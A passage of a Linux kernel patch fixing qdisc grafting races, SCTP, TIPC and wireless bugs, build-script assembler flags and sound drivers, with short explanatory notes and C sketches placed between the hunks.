+ 				NL_SET_ERR_MSG(extack, "Device does not have an ingress queue");
+ 				return -ENOENT;
+ 			}
++
++			q = rtnl_dereference(dev_queue->qdisc_sleeping);
++
++			/* This is the counterpart of that qdisc_refcount_inc_nz() call in
++			 * __tcf_qdisc_find() for filter requests.
++			 */
++			if (!qdisc_refcount_dec_if_one(q)) {
++				NL_SET_ERR_MSG(extack,
++					       "Current ingress or clsact Qdisc has ongoing filter requests");
++				return -EBUSY;
++			}
+ 		}
+ 
+ 		if (dev->flags & IFF_UP)
+@@ -1089,18 +1109,26 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent,
+ 		if (new && new->ops->attach && !ingress)
+ 			goto skip;
+ 
+-		for (i = 0; i < num_q; i++) {
+-			struct netdev_queue *dev_queue = dev_ingress_queue(dev);
+-
+-			if (!ingress)
++		if (!ingress) {
++			for (i = 0; i < num_q; i++) {
+ 				dev_queue = netdev_get_tx_queue(dev, i);
++				old = dev_graft_qdisc(dev_queue, new);
+ 
+-			old = dev_graft_qdisc(dev_queue, new);
+-			if (new && i > 0)
+-				qdisc_refcount_inc(new);
+-
+-			if (!ingress)
++				if (new && i > 0)
++					qdisc_refcount_inc(new);
+ 				qdisc_put(old);
++			}
++		} else {
++			old = dev_graft_qdisc(dev_queue, NULL);
++
++			/* {ingress,clsact}_destroy() @old before grafting @new to avoid
++			 * unprotected concurrent accesses to net_device::miniq_{in,e}gress
++			 * pointer(s) in mini_qdisc_pair_swap().
++			 */
++			qdisc_notify(net, skb, n, classid, old, new, extack);
++			qdisc_destroy(old);
++
++			dev_graft_qdisc(dev_queue, new);
+ 		}
+ 
+ skip:
+@@ -1110,12 +1138,10 @@ skip:
+ 				qdisc_refcount_inc(new);
+ 			rcu_assign_pointer(dev->qdisc, new ? : &noop_qdisc);
+ 
+-			notify_and_destroy(net, skb, n, classid, old, new);
++			notify_and_destroy(net, skb, n, classid, old, new, extack);
+ 
+ 			if (new && new->ops->attach)
+ 				new->ops->attach(new);
+-		} else {
+-			notify_and_destroy(net, skb, n, classid, old, new);
+ 		}
+ 
+ 		if (dev->flags & IFF_UP)
+@@ -1146,7 +1172,7 @@ skip:
+ 		err = cops->graft(parent, cl, new, &old, extack);
+ 		if (err)
+ 			return err;
+-		notify_and_destroy(net, skb, n, classid, old, new);
++		notify_and_destroy(net, skb, n, classid, old, new, extack);
+ 	}
+ 	return 0;
+ }
+@@ -1519,7 +1545,7 @@ static int tc_get_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 		if (err != 0)
+ 			return err;
+ 	} else {
+-		qdisc_notify(net, skb, n, clid, NULL, q);
++		qdisc_notify(net, skb, n, clid, NULL, q, NULL);
+ 	}
+ 	return 0;
+ }
+@@ -1667,7 +1693,7 @@ replay:
+ 	}
+ 	err = qdisc_change(q, tca, extack);
+ 	if (err == 0)
+-		qdisc_notify(net, skb, n, clid, NULL, q);
++		qdisc_notify(net, skb, n, clid, NULL, q, extack);
+ 	return err;
+ 
+ create_n_graft:
+@@ -1734,7 +1760,7 @@ static int tc_dump_qdisc_root(struct Qdisc *root, struct sk_buff *skb,
+ 		if (!tc_qdisc_dump_ignore(q, dump_invisible) &&
+ 		    tc_fill_qdisc(skb, q, q->parent, NETLINK_CB(cb->skb).portid,
+ 				  cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-				  RTM_NEWQDISC) <= 0)
++				  RTM_NEWQDISC, NULL) <= 0)
+ 			goto done;
+ 		q_idx++;
+ 	}
+@@ -1756,7 +1782,7 @@ static int tc_dump_qdisc_root(struct Qdisc *root, struct sk_buff *skb,
+ 		if (!tc_qdisc_dump_ignore(q, dump_invisible) &&
+ 		    tc_fill_qdisc(skb, q, q->parent, NETLINK_CB(cb->skb).portid,
+ 				  cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-				  RTM_NEWQDISC) <= 0)
++				  RTM_NEWQDISC, NULL) <= 0)
+ 			goto done;
+ 		q_idx++;
+ 	}
+@@ -1829,8 +1855,8 @@ done:
+  ************************************************/
+ 
+ static int tc_fill_tclass(struct sk_buff *skb, struct Qdisc *q,
+-			  unsigned long cl,
+-			  u32 portid, u32 seq, u16 flags, int event)
++			  unsigned long cl, u32 portid, u32 seq, u16 flags,
++			  int event, struct netlink_ext_ack *extack)
+ {
+ 	struct tcmsg *tcm;
+ 	struct nlmsghdr  *nlh;
+@@ -1865,7 +1891,12 @@ static int tc_fill_tclass(struct sk_buff *skb, struct Qdisc *q,
+ 	if (gnet_stats_finish_copy(&d) < 0)
+ 		goto nla_put_failure;
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -1876,7 +1907,7 @@ nla_put_failure:
+ 
+ static int tclass_notify(struct net *net, struct sk_buff *oskb,
+ 			 struct nlmsghdr *n, struct Qdisc *q,
+-			 unsigned long cl, int event)
++			 unsigned long cl, int event, struct netlink_ext_ack *extack)
+ {
+ 	struct sk_buff *skb;
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+@@ -1885,7 +1916,7 @@ static int tclass_notify(struct net *net, struct sk_buff *oskb,
+ 	if (!skb)
+ 		return -ENOBUFS;
+ 
+-	if (tc_fill_tclass(skb, q, cl, portid, n->nlmsg_seq, 0, event) < 0) {
++	if (tc_fill_tclass(skb, q, cl, portid, n->nlmsg_seq, 0, event, extack) < 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -1912,7 +1943,7 @@ static int tclass_del_notify(struct net *net,
+ 		return -ENOBUFS;
+ 
+ 	if (tc_fill_tclass(skb, q, cl, portid, n->nlmsg_seq, 0,
+-			   RTM_DELTCLASS) < 0) {
++			   RTM_DELTCLASS, extack) < 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -2119,7 +2150,7 @@ static int tc_ctl_tclass(struct sk_buff *skb, struct nlmsghdr *n,
+ 			tc_bind_tclass(q, portid, clid, 0);
+ 			goto out;
+ 		case RTM_GETTCLASS:
+-			err = tclass_notify(net, skb, n, q, cl, RTM_NEWTCLASS);
++			err = tclass_notify(net, skb, n, q, cl, RTM_NEWTCLASS, extack);
+ 			goto out;
+ 		default:
+ 			err = -EINVAL;
+@@ -2137,7 +2168,7 @@ static int tc_ctl_tclass(struct sk_buff *skb, struct nlmsghdr *n,
+ 	if (cops->change)
+ 		err = cops->change(q, clid, portid, tca, &new_cl, extack);
+ 	if (err == 0) {
+-		tclass_notify(net, skb, n, q, new_cl, RTM_NEWTCLASS);
++		tclass_notify(net, skb, n, q, new_cl, RTM_NEWTCLASS, extack);
+ 		/* We just create a new class, need to do reverse binding. */
+ 		if (cl != new_cl)
+ 			tc_bind_tclass(q, portid, clid, new_cl);
+@@ -2159,7 +2190,7 @@ static int qdisc_class_dump(struct Qdisc *q, unsigned long cl,
+ 
+ 	return tc_fill_tclass(a->skb, q, cl, NETLINK_CB(a->cb->skb).portid,
+ 			      a->cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-			      RTM_NEWTCLASS);
++			      RTM_NEWTCLASS, NULL);
+ }
+ 
+ static int tc_dump_tclass_qdisc(struct Qdisc *q, struct sk_buff *skb,
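
qdisc_refcount_dec_if_one() in the graft hunk above only lets the ingress path proceed when it holds the sole reference, returning -EBUSY otherwise. Roughly the same primitive can be sketched with C11 atomics (illustrative only, not the kernel implementation):

    /* dec-if-one: succeed only on the 1 -> 0 transition. */
    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdio.h>

    static bool refcount_dec_if_one(atomic_int *ref)
    {
        int expected = 1;

        return atomic_compare_exchange_strong(ref, &expected, 0);
    }

    int main(void)
    {
        atomic_int ref = 2;     /* a filter request still holds a ref */

        if (!refcount_dec_if_one(&ref))
            printf("busy, refusing to destroy\n");
        atomic_fetch_sub(&ref, 1);      /* other holder drops out */
        if (refcount_dec_if_one(&ref))
            printf("sole owner, destroying\n");
        return 0;
    }
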
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index ee43e8ac039ed..a5693e25b2482 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -1046,7 +1046,7 @@ static void qdisc_free_cb(struct rcu_head *head)
+ 	qdisc_free(q);
+ }
+ 
+-static void qdisc_destroy(struct Qdisc *qdisc)
++static void __qdisc_destroy(struct Qdisc *qdisc)
+ {
+ 	const struct Qdisc_ops  *ops = qdisc->ops;
+ 
+@@ -1070,6 +1070,14 @@ static void qdisc_destroy(struct Qdisc *qdisc)
+ 	call_rcu(&qdisc->rcu, qdisc_free_cb);
+ }
+ 
++void qdisc_destroy(struct Qdisc *qdisc)
++{
++	if (qdisc->flags & TCQ_F_BUILTIN)
++		return;
++
++	__qdisc_destroy(qdisc);
++}
++
+ void qdisc_put(struct Qdisc *qdisc)
+ {
+ 	if (!qdisc)
+@@ -1079,7 +1087,7 @@ void qdisc_put(struct Qdisc *qdisc)
+ 	    !refcount_dec_and_test(&qdisc->refcnt))
+ 		return;
+ 
+-	qdisc_destroy(qdisc);
++	__qdisc_destroy(qdisc);
+ }
+ EXPORT_SYMBOL(qdisc_put);
+ 
+@@ -1094,7 +1102,7 @@ void qdisc_put_unlocked(struct Qdisc *qdisc)
+ 	    !refcount_dec_and_rtnl_lock(&qdisc->refcnt))
+ 		return;
+ 
+-	qdisc_destroy(qdisc);
++	__qdisc_destroy(qdisc);
+ 	rtnl_unlock();
+ }
+ EXPORT_SYMBOL(qdisc_put_unlocked);
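
The sch_generic.c split above turns qdisc_destroy() into a thin guard around __qdisc_destroy(), so the newly exported entry point can never tear down a built-in qdisc. The wrapper shape, in a hedged standalone sketch:

    #include <stdio.h>

    #define FL_BUILTIN 0x1

    struct obj { unsigned flags; const char *name; };

    static void __obj_destroy(struct obj *o)
    {
        printf("destroying %s\n", o->name);   /* real teardown here */
    }

    static void obj_destroy(struct obj *o)
    {
        if (o->flags & FL_BUILTIN)
            return;             /* static singletons are never freed */
        __obj_destroy(o);
    }

    int main(void)
    {
        struct obj noop = { FL_BUILTIN, "noop" }, dyn = { 0, "fq" };

        obj_destroy(&noop);     /* no-op */
        obj_destroy(&dyn);      /* prints */
        return 0;
    }
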
+diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
+index f6ee7f4040c14..5383b6a9da61c 100644
+--- a/net/sctp/sm_statefuns.c
++++ b/net/sctp/sm_statefuns.c
+@@ -4484,7 +4484,7 @@ enum sctp_disposition sctp_sf_eat_auth(struct net *net,
+ 				    SCTP_AUTH_NEW_KEY, GFP_ATOMIC);
+ 
+ 		if (!ev)
+-			return -ENOMEM;
++			return SCTP_DISPOSITION_NOMEM;
+ 
+ 		sctp_add_cmd_sf(commands, SCTP_CMD_EVENT_ULP,
+ 				SCTP_ULPEVENT(ev));
+diff --git a/net/tipc/bearer.c b/net/tipc/bearer.c
+index 53881406e2006..cdcd2731860ba 100644
+--- a/net/tipc/bearer.c
++++ b/net/tipc/bearer.c
+@@ -1258,7 +1258,7 @@ int tipc_nl_media_get(struct sk_buff *skb, struct genl_info *info)
+ 	struct tipc_nl_msg msg;
+ 	struct tipc_media *media;
+ 	struct sk_buff *rep;
+-	struct nlattr *attrs[TIPC_NLA_BEARER_MAX + 1];
++	struct nlattr *attrs[TIPC_NLA_MEDIA_MAX + 1];
+ 
+ 	if (!info->attrs[TIPC_NLA_MEDIA])
+ 		return -EINVAL;
+@@ -1307,7 +1307,7 @@ int __tipc_nl_media_set(struct sk_buff *skb, struct genl_info *info)
+ 	int err;
+ 	char *name;
+ 	struct tipc_media *m;
+-	struct nlattr *attrs[TIPC_NLA_BEARER_MAX + 1];
++	struct nlattr *attrs[TIPC_NLA_MEDIA_MAX + 1];
+ 
+ 	if (!info->attrs[TIPC_NLA_MEDIA])
+ 		return -EINVAL;
+diff --git a/net/wireless/rdev-ops.h b/net/wireless/rdev-ops.h
+index 13b209a8db287..ee853a14a02de 100644
+--- a/net/wireless/rdev-ops.h
++++ b/net/wireless/rdev-ops.h
+@@ -2,7 +2,7 @@
+ /*
+  * Portions of this file
+  * Copyright(c) 2016-2017 Intel Deutschland GmbH
+- * Copyright (C) 2018, 2021-2022 Intel Corporation
++ * Copyright (C) 2018, 2021-2023 Intel Corporation
+  */
+ #ifndef __CFG80211_RDEV_OPS
+ #define __CFG80211_RDEV_OPS
+@@ -1441,8 +1441,8 @@ rdev_del_intf_link(struct cfg80211_registered_device *rdev,
+ 		   unsigned int link_id)
+ {
+ 	trace_rdev_del_intf_link(&rdev->wiphy, wdev, link_id);
+-	if (rdev->ops->add_intf_link)
+-		rdev->ops->add_intf_link(&rdev->wiphy, wdev, link_id);
++	if (rdev->ops->del_intf_link)
++		rdev->ops->del_intf_link(&rdev->wiphy, wdev, link_id);
+ 	trace_rdev_return_void(&rdev->wiphy);
+ }
+ 
+diff --git a/net/wireless/reg.c b/net/wireless/reg.c
+index 4f3f31244e8ba..522180919a1a3 100644
+--- a/net/wireless/reg.c
++++ b/net/wireless/reg.c
+@@ -2442,11 +2442,8 @@ static bool reg_wdev_chan_valid(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 		case NL80211_IFTYPE_P2P_GO:
+ 		case NL80211_IFTYPE_ADHOC:
+ 		case NL80211_IFTYPE_MESH_POINT:
+-			wiphy_lock(wiphy);
+ 			ret = cfg80211_reg_can_beacon_relax(wiphy, &chandef,
+ 							    iftype);
+-			wiphy_unlock(wiphy);
+-
+ 			if (!ret)
+ 				return ret;
+ 			break;
+@@ -2478,11 +2475,11 @@ static void reg_leave_invalid_chans(struct wiphy *wiphy)
+ 	struct wireless_dev *wdev;
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
+ 
+-	ASSERT_RTNL();
+-
++	wiphy_lock(wiphy);
+ 	list_for_each_entry(wdev, &rdev->wiphy.wdev_list, list)
+ 		if (!reg_wdev_chan_valid(wiphy, wdev))
+ 			cfg80211_leave(rdev, wdev);
++	wiphy_unlock(wiphy);
+ }
+ 
+ static void reg_check_chans_work(struct work_struct *work)
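
The reg.c hunks move the wiphy locking out of reg_wdev_chan_valid() and take it once in reg_leave_invalid_chans() around the whole interface walk. The same lock-scope widening in a runnable pthread sketch (hypothetical names; build with -pthread):

    #include <pthread.h>
    #include <stdio.h>

    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static int items[3] = { 1, -1, 2 };

    static int item_valid(int v)    /* caller holds the lock */
    {
        return v >= 0;
    }

    static void drop_invalid(void)
    {
        pthread_mutex_lock(&lock);  /* one lock for the whole pass */
        for (int i = 0; i < 3; i++)
            if (!item_valid(items[i]))
                printf("dropping item %d\n", i);
        pthread_mutex_unlock(&lock);
    }

    int main(void) { drop_invalid(); return 0; }
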
+diff --git a/scripts/Kconfig.include b/scripts/Kconfig.include
+index 274125307ebd7..5a84b6443875c 100644
+--- a/scripts/Kconfig.include
++++ b/scripts/Kconfig.include
+@@ -33,7 +33,7 @@ ld-option = $(success,$(LD) -v $(1))
+ 
+ # $(as-instr,<instr>)
+ # Return y if the assembler supports <instr>, n otherwise
+-as-instr = $(success,printf "%b\n" "$(1)" | $(CC) $(CLANG_FLAGS) -c -x assembler -o /dev/null -)
++as-instr = $(success,printf "%b\n" "$(1)" | $(CC) $(CLANG_FLAGS) -c -x assembler-with-cpp -o /dev/null -)
+ 
+ # check if $(CC) and $(LD) exist
+ $(error-if,$(failure,command -v $(CC)),C compiler '$(CC)' not found)
+diff --git a/scripts/Makefile.compiler b/scripts/Makefile.compiler
+index 20d353dcabfbc..158c57f2acfde 100644
+--- a/scripts/Makefile.compiler
++++ b/scripts/Makefile.compiler
+@@ -29,16 +29,16 @@ try-run = $(shell set -e;		\
+ 	fi)
+ 
+ # as-option
+-# Usage: cflags-y += $(call as-option,-Wa$(comma)-isa=foo,)
++# Usage: aflags-y += $(call as-option,-Wa$(comma)-isa=foo,)
+ 
+ as-option = $(call try-run,\
+-	$(CC) $(KBUILD_CFLAGS) $(1) -c -x assembler /dev/null -o "$$TMP",$(1),$(2))
++	$(CC) -Werror $(KBUILD_AFLAGS) $(1) -c -x assembler-with-cpp /dev/null -o "$$TMP",$(1),$(2))
+ 
+ # as-instr
+-# Usage: cflags-y += $(call as-instr,instr,option1,option2)
++# Usage: aflags-y += $(call as-instr,instr,option1,option2)
+ 
+ as-instr = $(call try-run,\
+-	printf "%b\n" "$(1)" | $(CC) $(KBUILD_AFLAGS) -c -x assembler -o "$$TMP" -,$(2),$(3))
++	printf "%b\n" "$(1)" | $(CC) -Werror $(KBUILD_AFLAGS) -c -x assembler-with-cpp -o "$$TMP" -,$(2),$(3))
+ 
+ # __cc-option
+ # Usage: MY_CFLAGS += $(call __cc-option,$(CC),$(MY_CFLAGS),-march=winchip-c6,-march=i586)
+diff --git a/scripts/as-version.sh b/scripts/as-version.sh
+index 1a21495e9ff05..af717476152d1 100755
+--- a/scripts/as-version.sh
++++ b/scripts/as-version.sh
+@@ -45,7 +45,7 @@ orig_args="$@"
+ # Get the first line of the --version output.
+ IFS='
+ '
+-set -- $(LC_ALL=C "$@" -Wa,--version -c -x assembler /dev/null -o /dev/null 2>/dev/null)
++set -- $(LC_ALL=C "$@" -Wa,--version -c -x assembler-with-cpp /dev/null -o /dev/null 2>/dev/null)
+ 
+ # Split the line on spaces.
+ IFS=' '
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 48a0e87136f1c..920e44ba998a5 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11738,6 +11738,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1b0a, 0x01b8, "ACER Veriton", ALC662_FIXUP_ACER_VERITON),
+ 	SND_PCI_QUIRK(0x1b35, 0x1234, "CZC ET26", ALC662_FIXUP_CZC_ET26),
+ 	SND_PCI_QUIRK(0x1b35, 0x2206, "CZC P10T", ALC662_FIXUP_CZC_P10T),
++	SND_PCI_QUIRK(0x1c6c, 0x1239, "Compaq N14JP6-V2", ALC897_FIXUP_HP_HSMIC_VERB),
+ 
+ #if 0
+ 	/* Below is a quirk table taken from the old code.
+diff --git a/sound/soc/codecs/cs35l41-lib.c b/sound/soc/codecs/cs35l41-lib.c
+index 04be71435491e..c2c56e5608094 100644
+--- a/sound/soc/codecs/cs35l41-lib.c
++++ b/sound/soc/codecs/cs35l41-lib.c
+@@ -46,7 +46,7 @@ static const struct reg_default cs35l41_reg[] = {
+ 	{ CS35L41_DSP1_RX5_SRC,			0x00000020 },
+ 	{ CS35L41_DSP1_RX6_SRC,			0x00000021 },
+ 	{ CS35L41_DSP1_RX7_SRC,			0x0000003A },
+-	{ CS35L41_DSP1_RX8_SRC,			0x00000001 },
++	{ CS35L41_DSP1_RX8_SRC,			0x0000003B },
+ 	{ CS35L41_NGATE1_SRC,			0x00000008 },
+ 	{ CS35L41_NGATE2_SRC,			0x00000009 },
+ 	{ CS35L41_AMP_DIG_VOL_CTRL,		0x00008000 },
+@@ -58,8 +58,8 @@ static const struct reg_default cs35l41_reg[] = {
+ 	{ CS35L41_IRQ1_MASK2,			0xFFFFFFFF },
+ 	{ CS35L41_IRQ1_MASK3,			0xFFFF87FF },
+ 	{ CS35L41_IRQ1_MASK4,			0xFEFFFFFF },
+-	{ CS35L41_GPIO1_CTRL1,			0xE1000001 },
+-	{ CS35L41_GPIO2_CTRL1,			0xE1000001 },
++	{ CS35L41_GPIO1_CTRL1,			0x81000001 },
++	{ CS35L41_GPIO2_CTRL1,			0x81000001 },
+ 	{ CS35L41_MIXER_NGATE_CFG,		0x00000000 },
+ 	{ CS35L41_MIXER_NGATE_CH1_CFG,		0x00000303 },
+ 	{ CS35L41_MIXER_NGATE_CH2_CFG,		0x00000303 },
+diff --git a/sound/soc/dwc/dwc-i2s.c b/sound/soc/dwc/dwc-i2s.c
+index 3496301582b22..f966d39c5c907 100644
+--- a/sound/soc/dwc/dwc-i2s.c
++++ b/sound/soc/dwc/dwc-i2s.c
+@@ -183,30 +183,6 @@ static void i2s_stop(struct dw_i2s_dev *dev,
+ 	}
+ }
+ 
+-static int dw_i2s_startup(struct snd_pcm_substream *substream,
+-		struct snd_soc_dai *cpu_dai)
+-{
+-	struct dw_i2s_dev *dev = snd_soc_dai_get_drvdata(cpu_dai);
+-	union dw_i2s_snd_dma_data *dma_data = NULL;
+-
+-	if (!(dev->capability & DWC_I2S_RECORD) &&
+-			(substream->stream == SNDRV_PCM_STREAM_CAPTURE))
+-		return -EINVAL;
+-
+-	if (!(dev->capability & DWC_I2S_PLAY) &&
+-			(substream->stream == SNDRV_PCM_STREAM_PLAYBACK))
+-		return -EINVAL;
+-
+-	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+-		dma_data = &dev->play_dma_data;
+-	else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+-		dma_data = &dev->capture_dma_data;
+-
+-	snd_soc_dai_set_dma_data(cpu_dai, substream, (void *)dma_data);
+-
+-	return 0;
+-}
+-
+ static void dw_i2s_config(struct dw_i2s_dev *dev, int stream)
+ {
+ 	u32 ch_reg;
+@@ -305,12 +281,6 @@ static int dw_i2s_hw_params(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static void dw_i2s_shutdown(struct snd_pcm_substream *substream,
+-		struct snd_soc_dai *dai)
+-{
+-	snd_soc_dai_set_dma_data(dai, substream, NULL);
+-}
+-
+ static int dw_i2s_prepare(struct snd_pcm_substream *substream,
+ 			  struct snd_soc_dai *dai)
+ {
+@@ -382,8 +352,6 @@ static int dw_i2s_set_fmt(struct snd_soc_dai *cpu_dai, unsigned int fmt)
+ }
+ 
+ static const struct snd_soc_dai_ops dw_i2s_dai_ops = {
+-	.startup	= dw_i2s_startup,
+-	.shutdown	= dw_i2s_shutdown,
+ 	.hw_params	= dw_i2s_hw_params,
+ 	.prepare	= dw_i2s_prepare,
+ 	.trigger	= dw_i2s_trigger,
+@@ -625,6 +593,14 @@ static int dw_configure_dai_by_dt(struct dw_i2s_dev *dev,
+ 
+ }
+ 
++static int dw_i2s_dai_probe(struct snd_soc_dai *dai)
++{
++	struct dw_i2s_dev *dev = snd_soc_dai_get_drvdata(dai);
++
++	snd_soc_dai_init_dma_data(dai, &dev->play_dma_data, &dev->capture_dma_data);
++	return 0;
++}
++
+ static int dw_i2s_probe(struct platform_device *pdev)
+ {
+ 	const struct i2s_platform_data *pdata = pdev->dev.platform_data;
+@@ -643,6 +619,7 @@ static int dw_i2s_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	dw_i2s_dai->ops = &dw_i2s_dai_ops;
++	dw_i2s_dai->probe = dw_i2s_dai_probe;
+ 
+ 	dev->i2s_base = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 	if (IS_ERR(dev->i2s_base))
+diff --git a/sound/soc/intel/avs/board_selection.c b/sound/soc/intel/avs/board_selection.c
+index 87f9c18be238d..87353b4b0cd73 100644
+--- a/sound/soc/intel/avs/board_selection.c
++++ b/sound/soc/intel/avs/board_selection.c
+@@ -394,7 +394,7 @@ static int avs_register_i2s_boards(struct avs_dev *adev)
+ 	}
+ 
+ 	for (mach = boards->machs; mach->id[0]; mach++) {
+-		if (!acpi_dev_present(mach->id, NULL, -1))
++		if (!acpi_dev_present(mach->id, mach->uid, -1))
+ 			continue;
+ 
+ 		if (mach->machine_quirk)
+diff --git a/sound/soc/intel/avs/pcm.c b/sound/soc/intel/avs/pcm.c
+index 8fe5917b1e263..22f21f3f612d1 100644
+--- a/sound/soc/intel/avs/pcm.c
++++ b/sound/soc/intel/avs/pcm.c
+@@ -424,21 +424,34 @@ static int avs_dai_fe_startup(struct snd_pcm_substream *substream, struct snd_so
+ 
+ 	host_stream = snd_hdac_ext_stream_assign(bus, substream, HDAC_EXT_STREAM_TYPE_HOST);
+ 	if (!host_stream) {
+-		kfree(data);
+-		return -EBUSY;
++		ret = -EBUSY;
++		goto err;
+ 	}
+ 
+ 	data->host_stream = host_stream;
+-	snd_pcm_hw_constraint_integer(runtime, SNDRV_PCM_HW_PARAM_PERIODS);
++	ret = snd_pcm_hw_constraint_integer(runtime, SNDRV_PCM_HW_PARAM_PERIODS);
++	if (ret < 0)
++		goto err;
++
+ 	/* avoid wrap-around with wall-clock */
+-	snd_pcm_hw_constraint_minmax(runtime, SNDRV_PCM_HW_PARAM_BUFFER_TIME, 20, 178000000);
+-	snd_pcm_hw_constraint_list(runtime, 0, SNDRV_PCM_HW_PARAM_RATE, &hw_rates);
++	ret = snd_pcm_hw_constraint_minmax(runtime, SNDRV_PCM_HW_PARAM_BUFFER_TIME, 20, 178000000);
++	if (ret < 0)
++		goto err;
++
++	ret = snd_pcm_hw_constraint_list(runtime, 0, SNDRV_PCM_HW_PARAM_RATE, &hw_rates);
++	if (ret < 0)
++		goto err;
++
+ 	snd_pcm_set_sync(substream);
+ 
+ 	dev_dbg(dai->dev, "%s fe STARTUP tag %d str %p",
+ 		__func__, hdac_stream(host_stream)->stream_tag, substream);
+ 
+ 	return 0;
++
++err:
++	kfree(data);
++	return ret;
+ }
+ 
+ static void avs_dai_fe_shutdown(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
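
avs_dai_fe_startup() above stops ignoring the return values of the hw-constraint helpers and routes every failure through a single err label that frees the data allocation. The classic goto-cleanup shape it adopts, as a self-contained sketch:

    #include <stdio.h>
    #include <stdlib.h>

    static int step(int rc) { return rc; }  /* stand-in for a constraint call */

    static int startup(void)
    {
        int ret;
        char *data = malloc(16);

        if (!data)
            return -1;

        ret = step(0);
        if (ret < 0)
            goto err;
        ret = step(-1);         /* fails: falls through to cleanup */
        if (ret < 0)
            goto err;

        free(data);             /* sketch only; kernel keeps data on success */
        return 0;
    err:
        free(data);             /* one place releases what was acquired */
        return ret;
    }

    int main(void) { printf("startup: %d\n", startup()); return 0; }
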
+diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
+index 7a486ca9633c1..f3964060a0447 100644
+--- a/sound/soc/soc-pcm.c
++++ b/sound/soc/soc-pcm.c
+@@ -2403,6 +2403,9 @@ int dpcm_be_dai_prepare(struct snd_soc_pcm_runtime *fe, int stream)
+ 		if (!snd_soc_dpcm_be_can_update(fe, be, stream))
+ 			continue;
+ 
++		if (!snd_soc_dpcm_can_be_prepared(fe, be, stream))
++			continue;
++
+ 		if ((be->dpcm[stream].state != SND_SOC_DPCM_STATE_HW_PARAMS) &&
+ 		    (be->dpcm[stream].state != SND_SOC_DPCM_STATE_STOP) &&
+ 		    (be->dpcm[stream].state != SND_SOC_DPCM_STATE_SUSPEND) &&
+@@ -3043,3 +3046,20 @@ int snd_soc_dpcm_can_be_params(struct snd_soc_pcm_runtime *fe,
+ 	return snd_soc_dpcm_check_state(fe, be, stream, state, ARRAY_SIZE(state));
+ }
+ EXPORT_SYMBOL_GPL(snd_soc_dpcm_can_be_params);
++
++/*
++ * We can only prepare a BE DAI if none of its FEs are prepared,
++ * running, or paused for the specified stream direction.
++ */
++int snd_soc_dpcm_can_be_prepared(struct snd_soc_pcm_runtime *fe,
++				 struct snd_soc_pcm_runtime *be, int stream)
++{
++	const enum snd_soc_dpcm_state state[] = {
++		SND_SOC_DPCM_STATE_START,
++		SND_SOC_DPCM_STATE_PAUSED,
++		SND_SOC_DPCM_STATE_PREPARE,
++	};
++
++	return snd_soc_dpcm_check_state(fe, be, stream, state, ARRAY_SIZE(state));
++}
++EXPORT_SYMBOL_GPL(snd_soc_dpcm_can_be_prepared);
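
snd_soc_dpcm_can_be_prepared() reuses snd_soc_dpcm_check_state(), which tests each FE's state against a short list of disallowed states. The core membership idiom, sketched standalone:

    #include <stdbool.h>
    #include <stdio.h>

    enum state { STOP, START, PAUSED, PREPARE };

    static bool state_in(enum state s, const enum state *set, int n)
    {
        for (int i = 0; i < n; i++)
            if (s == set[i])
                return true;
        return false;
    }

    int main(void)
    {
        const enum state busy[] = { START, PAUSED, PREPARE };

        /* prepare is allowed only when no peer is in a busy state */
        printf("STOP busy?  %d\n", state_in(STOP, busy, 3));
        printf("START busy? %d\n", state_in(START, busy, 3));
        return 0;
    }
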
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 1e1d7458bce10..f2c798c4506b0 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -650,6 +650,10 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 		goto unlock;
+ 	}
+ 
++	ret = snd_usb_pcm_change_state(subs, UAC3_PD_STATE_D0);
++	if (ret < 0)
++		goto unlock;
++
+  again:
+ 	if (subs->sync_endpoint) {
+ 		ret = snd_usb_endpoint_prepare(chip, subs->sync_endpoint);
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 3ecd1ba7fd4b1..6cf55b7f7a041 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2191,6 +2191,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2ab6, /* T+A devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x3336, /* HEM devices */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3353, /* Khadas devices */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3842, /* EVGA */
+diff --git a/tools/gpio/lsgpio.c b/tools/gpio/lsgpio.c
+index c61d061247e17..52a0be45410c9 100644
